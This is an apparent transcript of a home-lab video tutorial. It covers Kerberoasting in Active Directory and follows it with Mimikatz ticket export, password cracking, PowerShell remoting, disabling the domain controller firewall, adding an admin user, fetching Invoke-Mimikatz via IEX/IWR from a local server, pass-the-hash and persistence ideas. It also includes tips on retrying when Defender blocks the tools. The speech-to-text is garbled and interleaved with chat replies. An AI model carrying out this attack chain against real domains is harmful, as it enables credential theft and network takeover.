Alright, so welcome back. Today we're going to be looking at Kerberoasting. As you can see, I'm already in my Windows 11 machine. I already have, let me show you guys can actually see what I can see. Looks like you can. But I already have my, server set up and everything. He's all up and running and stuff. So we're going to try to do some Kerberoasting today, maybe invoke Mimikatz, things like that, right? I do have everything good to go for you guys. And yeah, let's start this off. Alright, so the very first thing with Kerberoasting. Hi, do you know me? Yeah, I remember you, Jay. Why, what's up? How you doing? I'm doing good, Jay. How you doing? So, very first thing we're gonna do with Kerberoasting, right, is we have to um, see if there's even anyone that's even Kerberoastable, right? We have to see if there's an SPN there. So, Kerberoasting, we're going to be attacking a service, right? That's what we're going to be doing, attacking a service, and see if that service has like admin privileges, something like that. A lot of times services have their password description, which this one does. Just like I did with the PMPT, I set it up the same exact way as this one over here. I think it's a different name though that I set up as. But we're gonna go ahead and do some Kerberoasting here. So we're gonna do very first thing we want to do is an IEX, IWR, and as usual, I do have my Python up and running. So I do have my Python up and running, so I do have a way to be able to download the script. IWR HTTP 192.168.0.36 / and we'll do powerview.ps1. Next for me, Jay, is going to be the CRTP, Certified Red Team Professional. Not in the Army, in the Marine Corps. Oh, I forgot to turn on. This has been happening lately a lot. Hi, there we go. But yeah, next certification is CRTP, so Certified Red Team Professional. Not done in the Marine Corps yet. No, but I am back home for like a little bit. All right, so we got that right. So that guy's now loaded into memory, correct? So let's go ahead and do a getnet user SPN. All right, and we can see that we have the Kerberoasting Grand Ticket. Okay, but then we also have this SPN down here. Now, as I said, this one does have a description because I did talk about that earlier in one of the videos. And if it did have a description with a password in it, you would see it like right there. I just wanted to show that like real quick. But we do have an SPN down here for an SQL service. Okay, awesome. Looks like the username is SQL service. Okay. And yeah, looks like this should work like right here. So looks like we could most likely use this guy for an SPN and probably DC01 SQL service principal name like right there, right on port 55895. EJPT. I don't really have the money to do that, Jay. I don't get paid to do any of this hacky stuff yet. If I got paid to do this stuff, like right here, I would 100% start sponsoring people for EJPT and stuff like that. But yeah, I have the money to do that. All right, so we got the service principal name, right? So we got our user SPN and everything, and this one's running as a service, correct? So it is a service, and it's SQL service, right? So what we can do from here now is we can go ahead and start to try to request some type of ticket for that service. So we can do a request SPN ticket, and it's going to be for the service principal name, DC01 SQL service, blah, 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 55895. Now, you may have a different service. You're going to have a different service name, everything, but there you go. That's one of the ones that you can do. It's going to say SPN1, just hit enter, and it'll say, all right, cool, you have your SPN now. All right, so to make sure that we actually requested that, we can do what's called a klist, klist.exe, okay? And as we can see here, we're looking for SQL service. So DC01 SQL service, Alice.1055895. So that 100% worked, right? We have that service like right there, correct? Awesome, cool. We go ahead and delete actually the old one that I had. Oh, no, I ain't on here. Never mind. Yeah, these ones right here, just in case. We'll delete those guys just in case we need to. And we have that service like right there, right? So we have the klist now, right? We have a cache ticket for it, right? So we have our cache ticket and everything, but yeah. So now we need to be able to utilize that cache ticket and actually be able to crack it or something like that. So what we're going to attempt to do is actually pull that ticket back to us and be able to crack it, right? That file, okay? No, Jay, I am still in the Marine Corps. I'm not pen tester. So to be able to do this, we have to export that ticket, right? So we're going to use Mimikatz to be able to export that ticket. So let's go ahead and do an invoke Mimikatz. My intentions, well, excuse me, not invoke Mimikatz, but first we need to actually do an IWR. My intention behind getting certificates is, so hopefully I can do this one day, because I have a lot of fun doing this stuff. So hopefully it's something I can do one day. And we will invoke Mimikatz, right? And after we do an invoke Mimikatz, hopefully it doesn't get caught. If it doesn't, cool. So we're writing in memory, right? Let's go ahead and do a invoke Mimikatz. Okay. Tag command. And what we're going to be doing is we are going to try and export a Kerberoast ticket, or the Kerberoast list. So we can say Kerberoast list / export. Right, there we are. Yeah, Jay, this is also whenever I do finally retire from the Marine Corps that I have something I would really like to do, to get into, because I really like this stuff like right here. So it's definitely something I want to keep doing, even if it's just on the side as a hobby or whatever else, and I do networking or something like that. But this is something I would really like to do, like right here. So hopefully we can export the Kerberoast list there, so the K list up there, right? Hopefully we can get that and export that, and from there, after that, what we're going to end up doing is we're going to end up trying to crack that file. Okay, that's going to be pretty much our last step, like right here, and then we go to trying to crack that file. Pretty much we just need to copy that file back over onto ourselves. This might take a minute, and I have had this all of a sudden Windows Defender finds it and shuts it down. Other times it just lets it go like right through. So if Windows Defender pops up over here and all of a sudden Powershell closes out, just try it again. Go back to the steps, try it again, and you may be able to, you may surprise yourself and it may just work. Okay. Now, excuse me, we have our DC01 SQL service here, right? And its name is 140A1000 John Nova, right? All this crap, right? So we want to take this whole thing, Control C, all right? We want to copy that whole thing, right? We're just going to go ahead and copy that to here, right? And, oh, because it's already sitting in C user. So let's go ahead and CD in the desktop, okay? Or actually, we'll just do a copy in the desktop. Boom. I'm not very good at copying, as you can tell. CD in the desktop, copy, there, okay? dir, and we have it in the desktop now, right? So let's go ahead and, all right, man. You have a good one, Jay. Have a good day. Let's go ahead and grab this guy, right? We'll copy him over. Okay, I can actually drag and drop with this thing, which I know like right now you guys are just seeing a small window. You're like, what am I supposed to do with this, right? But so give me 1 second here. So I can actually drag and drop him over, and I can get it so you guys can see everything here. There we go. Okay, cool. So let me go ahead and open this guy back up. I'm going to grab that 1.4 file, right? And I'm just going to drag him over and just drop him on my desktop here. There he is, okay? That's because I'm just remote desktop into the session, like right there, right? So now let's go ahead and let's try to crack this file. We're going to be using something called TGS crack. Okay? You can also write that file into hashcat and try it like that too. But we're going to be using something called TGS crack, which I pretty much already have set up over here. All right. So if I go into my Kerberoast file folder I have over here, if I go into Kerberoast, right, now this is all on GitHub, so if I do a dir, if you look for TGS repcrack.py, it's sitting right on GitHub, all right, very, very easy, okay, so I did have a problem with that, like right there, but right here, right on GitHub, okay, Kerberoast, and you just want to go ahead and just download that as a zip if you're using Windows, or a Git clone if you're using Kali, or I guess if you have Git set up on your Windows machine, then you do like that also. So we can go into, where am I at now? My home command prompt, there we go. And we go in here and we are going to do a Python, right? Python 3, TGS rep crack.py. Okay. We're going to say, hey, what's the word list that we're going to use? We're going to use rocky.txt, which I don't even have in here because I'm an asshole. Maybe we'll try 10K worst passes, I guess, .text. And then we'll try that 1.4, whatever. All right, so this one like right here is messed up, I believe. Let's go ahead and go into my downloads. CD into users, Ryan Y, downloads. I think this one was made for Python 2. And I'll have Python 2. Downloads, Kerberoast master, and let's go ahead and do a Python 3 again. See, that's like a rocky.txt to that, okay. So what we would technically do is we would copy that same. So let's go ahead and delete that 1.4 whatever. We'll go ahead and we will copy C, users, Ryan Y, OneDrive, desktop, one, whatever it is. So right here, right? Boom, dir. And there's my file now again, okay? And it is still that SQL service, remember? So let's go ahead and grab that TGS Python 3, TGS crack.py. And then we'll do rocky.txt for 140A 10,000 John. All right. Now, this is going to take a minute, all right, to be able to do. So, you know how long it takes. I might say, hey, this is the password. The password is in rocky.txt. I do know that. Because I already did this once, or maybe I could just scroll up and show you guys. I might just be able to scroll up also, just show you guys. So, we'll probably just do that. And then once the file cracks, I'll show you that one again. So, if I scroll up here, we can see right here, okay? I did that same exact command. I don't know if this 140, if this is the same exact. It actually looks the same exact, doesn't it? So use hashtag tell faster, cracking one tickets, and found password for ticket 0, password 1. All right. So for SQL service, the password is password 1. That like right there is Kerberoast. Okay. Now what can we do with that, right? That's great that we found the password. Now what? Right. Especially if we're working on Windows machine, you may not know about PS session. Okay. Let's go ahead and hop back over into my Windows 11 virtual box that's connected to my domain controller, right? And we're going to go ahead and we're going to do a sess equals new session, all right, or PS session, excuse me, PS session, sess equals new PS session. There we go, Jesus. I knew there was a new in there somewhere. New PS session for the computer name of DC tax 01. That's computer name, right? All right, it says negative. You cannot do that. All right. We can't do that as John Doe, right? So if I do a who am I, right? I'm John Doe. I'm not an administrator, as we see up here. If I do a who am I, yeah, okay. I can't do that. Got it. Let me try tag credentials. Is it credentials like that? Yeah, I think it's tag credentials, not credential, but tag credentials, and we'll do SQL service. Okay, so it is credential. Maybe I should just trust Windows. Oh God. Maybe I should just trust Windows next time. Tag credential, and I'm going to put in the password here. PSNSSW0RD1. And we don't get that error again, right? This time we don't get that error. That's strange, right? Let me go back over here, see if it cracked yet. Did not crack. So we didn't get that error, but now we have a session. But now what? What can we do with that session, right? Let's go ahead and we can enter PS session, or we can start using what's called script block. All right, so we can do a invoke command, tag script block, all right? Who am I? For the session of $sign sess, because that's what we told $sign sess is going to be this guy right here, right? And all of a sudden, I'm SQL service. If I do a who am I back here, I'm John. Now this is just like whenever we did ASREP roasting, right? We're SQL service over here, okay? Because as we go off, we utilize the ticket that we have cracked with, well, we cracked with, we're using the service now, the session now, that we have as the SQL service. We're utilizing him as we go across the network, right? Other things we can do. Go ahead and let me open up my cherry tree here because there's some pretty cool stuff that we can actually do with this guy. So I want to show you guys not script block. I'll show you guys about passing files across, because that's pretty cool, like right there. So script block, script block. Looks like the only thing that I really did here was just script block, huh? Yeah, it looks like the only thing I did here was just script block. Let's see here. Where else can I go? Stuff here's Azure roasting. Let's see if I did anything in there. I did not. Unconstrained delegation. Let's see if I did anything in here that we can script block, script block, script block. I like using script block. Can't tell. But there is another one, file something, text file, whatever it is, and that one's pretty cool. Let's go ahead and just try to figure it out. So we're gonna do a invoke command, text file path, right? We'll say file path. Let's go ahead and grab a file on here, right? So let's go ahead and do a wget, and this we'll see if this even works actually. Because it does have to be on the machine that you're running the session from. This like right here, okay? So whenever you use file path, as you can see, it did finally crack that ticket. Go ahead and CD back into users, Ryan Y, OneDrive, desktop, CRTP, tools, Python tech, mhp.server, port 80, right? We'll hop back over into here, into our Windows 11 machine there, and we're gonna try to do an invoke mimikatz. I don't know if this is actually gonna take it. We'll try it though. I feel like we're about to get a nice little, you can't do that. Okay, there it is, drop down, okay. So I can't do that, right? Can I though? Okay, there we go. I was like, wait a minute, can I? Because it's still on there, but all right. So it's not gonna let me do that. What we can do though is we can actually put that on the other machine. So file find what that allows you to do is like, let's say I had, you know what? Let's actually try it without that because I do have invoke mimikatz on here, right? I can do an invoke mimikatz, right? It's running in memory, right? So let's try to do the file path thing. We'll do an invoke command. I haven't tried this yet. If I haven't actually had it on there, file path. And let me look this up like real quick. Invoke command file path. This one's pretty cool. PowerShell basics. Invoke command full. Okay, so invoke command file path. Example PowerShell. Okay, so I think. Okay, this one like right here has me passing that file off to it. So yeah, I would actually need to actually have invoke mimikatz on my machine, which if I still have it actually, because it didn't delete it, it just didn't let me run it, right? Okay, so it did delete it there. Let's see if I can do this. Do a wget. And then from here, I'm going to try and take down the firewall on the domain controller, like real-time monitoring. I'm going to see, will that work, right? You got it. So, okay, there we go. I was about to say, what's going on over here? So let's go ahead and let's try and tear down the firewall on the domain controller. So we'll do an invoke command, right? Script block. Did I not copy that? There we go. For session of sets. And we've now taken down the firewall because we are an admin. According to that SQL service, right? We are an admin. So we've now taken down that firewall, okay? So now let's try to actually do, let's see if it's in here. Nope, it's deleted. I'll try to move like real fast with it, you know? We're trying to move fast, so fast. Okay, so invoke command, file, attack file path, invoke mimikatz, right? On session sets. No, okay, so we're not gonna be able to do that like right there. Since we did turn out a firewall though, we can just act as if we are part of this machine, okay? So we can do things like script block, right? We could then download Mimikatz onto it, right? We could always do a wget 192.168.0.36. Remember, we could also do this with IEX.IWR. We'll say invoke mimikatz.ps1, tag out file. Really invoke mimikatz.ps1. Here we could download that on the machine, right? Now, if I were to do a dir, we'll be able to see it on there, things like that on the script block, right? We could turn on remote desktop for it if we wanted to. We could add users if we want to, right? So we could do like a net user test, right? Oh, maybe we cannot. The username cannot find net user test, and then add a password /add. Maybe if I did it correctly, then we could. Maybe if I put slash correctly, I'll get there one day. And there we go. Okay, I'm about to say I'll get so many errors. I'll finally get there. Then we can do like a net local group, administrators /add test, and there we go. Okay, now if I do a net local group, administrators, should be able to see test in there, and we can, bam. Okay, stuff like that, right? So we could end up making our own user, right? We could so we already put Mimikatz on there, right? So we could do a dir. We see that Mimikatz is on there. We can now invoke Mimikatz, which this is actually going to be invoke Mimikatz.ps1. This is actually going to be for later on, because the next thing we're going to be doing is, since we already done some sort of privilege escalation, things like that, we're now going to be doing persistence. So we have to do persistence for this guy, right, and be able to stay in him once we run stuff. So this would actually be part of the persistence, like right here, running Mimikatz on the domain controller, being able to get those different hashes, and maybe do something like a golden ticket attack or something of that nature. So if we were going to domain persistence, we could then do a golden ticket attack, right? And that would be a lot of fun, you know. Silver ticket attack, we can try that, like right there, okay? We could try to do, we could, from here, from the script block right here, we could definitely run scheduled tasks, all right? And be able to create a scheduled task that will run at a certain time. And we could also just straight up just get into a PS session. That is another thing too. I don't know if I actually open up another Powershell. Oh, never mind, that one is actually done. So there we go, okay? So we're done with that, okay? So we can actually try to crack the, administrator's hash, like right here, or maybe do a pass the hash with him. We could do something like that. We can actually try to do a pass the hash like right now. I know. Everything's messed up. We can try to do a pass the hash like right now if you guys want to. We'll take that administrator and we'll try to do a little pass the hash with that NTLM hash rate. So that's going to go ahead, and that's going to be for a pass the hash. Boom. We want to scroll down like a little bit. There we go, right there, okay? That's why you always take notes for everything, right? So I'm going to go ahead and do a invoke command, or invoke Mimikatz attack command. That's the hash, right? And that's going to be for, user domain, right? User domain, NTLM, and then what you want to run. So we'll say /user will be administrator, /domain will be Alice, right? Slash Alice.wonderland.local. Okay. /NTLM will be a 6 for some reason. That's all I got. Administrator NTLM. There we go. Okay. /NTLM will be that. And then we'll do a /run PowerShell.exe. Bam. Let's go ahead and try to run that like real quick, see if we can. Hopefully we can. We don't know. I think we ran this before, didn't we? Didn't we already do a pass and hash before? I feel like we did. Maybe we'll do a pass the ticket next time. Well, that's gonna be golden ticket anyway, so we'll leave it like that. But yeah, we could run scheduled tasks, and that would all be domain persistence. And that is actually a part of PMPT. You do need to create domain persistence. So if you didn't know what else to do, you could do a golden ticket. You could do a scheduled task. You could put a user on there. That's persistence. Within the administrator's group or something, that's all persistence, like right there. What they count as persistence, I don't know. I have not taken that exam, but I'm sure that, if you have a golden ticket, they're going to count that as persistence. If you have a scheduled task, they're definitely going to count that as persistence. And did we get it? We did not. Acquire LSA, boom, boom. You know what we probably have to do? We probably have to run this in an administrator, right? So we probably have to upgrade our privileges out here, which we already have done that. So I wonder if I can just run as administrator. So we have done that before already, right? And let's go ahead and try to run the same exact command as administrator. Remember, we did use that power up in the first episode. No, excuse me, the second episode of this. We did use power up, and we were able to become an administrator by utilizing an unquoted service path, right? So oh, you. There we go. And we can probably do my top command again. Now remember, whenever you do this invoke web request, it only works for that PowerShell that you have open at that time. Whichever one you do now, okay? That's obviously not going to work. There we go. Okay. There we go. All right, we'll run that again, and hopefully the administrator password doesn't randomly change for some reason. You never know, but we'll run that again. If this one doesn't work, I'm not really too worried about it. Like right now, something else we can do. Since we talked about PS sessions, things like that, we can also do a enter PS session $$ ses tag session $ses, or for computer name, whatever. We are now within that system, right? Which I think I have shown this one before. We are now in there, okay? If I do a dir, cool, cd, I can go wherever I want because I'm an administrator, right? I'm SQL service, right? Who am I? Let's see, check out my privileges. I don't know them, what my privileges are. Okay, looks like I have a whole bunch of stuff that's actually enabled here. I'm going to try to minimize this just a little bit for you guys so you guys can see. And it looks like we did, who am I? And I'm John Doe, but it looks like I'm John Doe as an administrator on our machine, so I should be able to actually do a set equals. This is the machine that just opened up from Mimikatz. So this one should be me as an administrator with a pass to hash. Okay, so ses equals new PS session for computer name DC tag 01, right? Tag credentials, right? Credential. Ooh, I won't be able to do tag credential because this is only for, so I can only do script blocks like right now. So I can do a invoke command script block, right? Who am I? I can't even do it on a computer name. Let's try on DC01. Can I do that? Okay, so I am administrator on DC01. I'm not going to be able to make a credential because I have a pass to hash like right now, right? So that's what I'm doing like right now. As we can see, client administrator under Kerberoasting grand ticket, right? So administrator under HTTP DC01. That's the one that I'm working at like right now. I'm working on that guy like right now. And yeah, so I can do different things like this, invoke commands, and I could, since I am an administrator, I can tear down the firewall, do Mimikatz, I can do invoke Mimikatz. I should actually be able to do it on here because it's already on that other system. Let's see. Maybe not. Maybe I have to do the whole thing again. Since maybe it's different it's probably different for each session actually. But I could do a IEX IWR, right? So I could do all this. IEX IWR HTTP 192.168.0.36 invoke mimikatz.ps1, right? Could do all this stuff. Okay, if I actually spelled it correctly. Maybe I can't. Maybe I'm just being an asshole. Oh, contains malicious content been blocked by antivirus, guys. So I obviously have to do a little. And there we go with that. Okay, easy day, right? So if I come back over to this guy, because this is the administrator one now, let me go ahead and, like I said, let's get this guy a little bit small for you guys. And we'll do that same thing again. Who am I slash priv? You can see we're enabled on a lot of different stuff here, right? So EN-ABLD. Okay. So yeah, we can see we're enabled on a lot of different things. So we're looking like we're pretty golden on this guy does not really want to work all the way over here, does he? He just wants to sit right there, huh? There we go. Okay. So it looks like we got it. You know, we're on DC01. We're already in the guy. We're in there and everything. We can do whatever we want really from here. We did say that thing with a pass the hash over here, right? So we can now do an invoke mimikatz from over here, and pretty much just say that thing where we pass the hash again, right? To actually be able to get into the machine or try to crack those hashes, right? We could do something like that, right? I don't know if we even downloaded it. I wasn't really paying much attention. It says I downloaded it, but next I don't even have invoke mimikatz even out here. Maybe that's why. Might be just because I don't have it even on this one yet. There we go. Geez, I'm messing up typing like right now, huh? Okay. Yeah, I'm wondering, did it not download it up to here? Invoke command, script block, IEX, other invoke mimikatz.ps1, peer name DC01. I don't know why it's having so many problems up here, but it seems to be having some problems. I like the other one. That's great though. Might just have to exit out, go back into that guy and do whatever. But that shows you a few different ways on how we can do this right. Shows you a few different capabilities of what we can do and everything, and being able to, we're running as administrator like right now. We passed the hash. We have different things going on here, and we did all this starting off just with Kerberoasting and getting one password. All right, so hopefully you guys enjoyed the video. Hopefully you guys learned something. I always enjoy making these. I always learn something again every time I go through them. So hopefully you guys too. So I'll talk to you later.